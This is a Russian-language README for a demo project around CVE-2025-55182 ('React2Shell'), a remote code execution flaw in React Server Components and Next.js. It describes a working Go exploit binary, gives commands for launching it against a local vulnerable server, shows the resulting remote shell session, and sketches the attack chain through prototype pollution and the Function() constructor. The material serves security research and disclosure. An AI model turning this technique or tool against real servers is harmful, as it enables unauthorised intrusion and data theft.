
Этот проект предоставляет полностью функциональную демонстрацию CVE-2025-55182 (React2Shell) — критической уязвимости удалённого выполнения кода в React Server Components и Next.js.
Этот проект представляет полностью функциональную демонстрацию CVE-2025-55182 (React2Shell) — критической уязвимости удалённого выполнения кода в React Server Components и Next.js.
Статус: ✅ РАБОТАЕТ — обеспечивает реальное выполнение команд на уязвимых серверах
CVE-2025-55182 (скомпилированный исполняемый файл 7.8MB)📥 Скачать демо-видео (5.6MB) — нажмите, чтобы скачать и посмотреть эксплойт в действии
Что показывает демонстрация:
cd exploited-server
npm run dev
# Server starts on http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# When prompted:
Target: localhost:3001
Основные команды:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Операции с файлами:
subh@rce $ touch hello.txt
[+] Created: hello.txt
subh@rce $ vi hello.txt
[i] Enter new content (type 'EOF' on a line by itself to finish):
Hello World!
EOF
[+] File saved: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] File written
subh@rce $ rm hello.txt
[+] Removed: hello.txt
Информация о системе:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Выход:
subh@rce $ exit
Этот проект демонстрирует:
✅ Реальная эксплуатация — фактическая работающая RCE на уязвимых системах
✅ Исследования безопасности — понимание уязвимостей современных веб-фреймворков
✅ Разработка на Go — компиляция и использование инструментов безопасности
✅ Анализ уязвимостей — исследование CVE и техники эксплуатации
✅ Ответственное раскрытие — этичные практики тестирования безопасности
react-2-shell-demo/
├── CVE-2025-55182 # Compiled Go exploit binary
├── main.go # Go source code
├── exploited-server/ # Vulnerable Next.js app
│ ├── app/
│ │ ├── actions.ts # Server Actions (vulnerable)
│ │ └── page.tsx # Warning UI
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Documentation
CVE-2025-55182 эксплуатирует небезопасную десериализацию в React Server Components:
__proto__Function()1. Craft multipart payload with malicious chunks
2. Send to Next.js Server Actions endpoint
3. Trigger prototype pollution via __proto__:then
4. Invoke Function() constructor with command
5. Execute code and return output via redirect
6. Parse result from X-Action-Redirect header
КРИТИЧЕСКИЕ УВЕДОМЛЕНИЯ:
README.md — этот файлGO_EXPLOIT_USAGE.md — подробное использование эксплойтаVULNERABLE_SERVER.md — руководство по настройке сервераEXPLOITATION_GUIDE.md — техническое погружениеUSAGE.md — примеры использования и командыnpm run dev в exploited-server)./CVE-2025-55182)Этот проект успешно демонстрирует:
Для производственных систем:
Немедленно обновитесь до исправленных версий:
Ротируйте секреты, если они были раскрыты до 4 декабря 2025 года
Отслеживайте логи на предмет подозрительной активности Server Actions
Проведите аудит приложений, использующих Server Components
@subhdotsol — в образовательных и исследовательских целях в области безопасности
Этот код предназначен только для образовательных целей и авторизованного тестирования безопасности.
Помните: всегда получайте надлежащее разрешение перед тестированием. Используйте ответственно! 🔒